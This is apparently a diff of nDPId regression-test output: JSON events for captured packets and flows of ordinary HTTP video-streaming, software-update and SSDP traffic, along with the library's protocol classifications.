+01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353157468,"pkt":"TF4M6gNlABxCjnAxCABFAAOkD3JAAIAG2tjAqHMIymwO7MU9AFA84A6MMfAazlAYQTez3QAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNTcwNDYmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7560000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00992{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"thread_ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\/e7VVAYAQRcuQAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQpSYW5nZTogYnl0ZXM9MzQyNDI1Ni04MDU3MDIzDQoNCg=="} +01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7560000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1467353158696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353158696,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLHIAAAER1v7AqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} -00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} -00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353159731,"pkt":"TF4M6gNlABxCjnAxCABFAAGgFhZAAIAGZjTAqHMI3xpqQsU+AFB4823zkD5tZ1AYAQS6ZwAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2Y3JjP2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQoNCg=="} -00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"thread_ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} +00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353159731,"pkt":"TF4M6gNlABxCjnAxCABFAAGgFhZAAIAGZjTAqHMI3xpqQsU+AFB4823zkD5tZ1AYAQS6ZwAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2Y3JjP2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQoNCg=="} +00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"thread_ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1467353160157,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353160157,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClHaUAAAER5dDAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 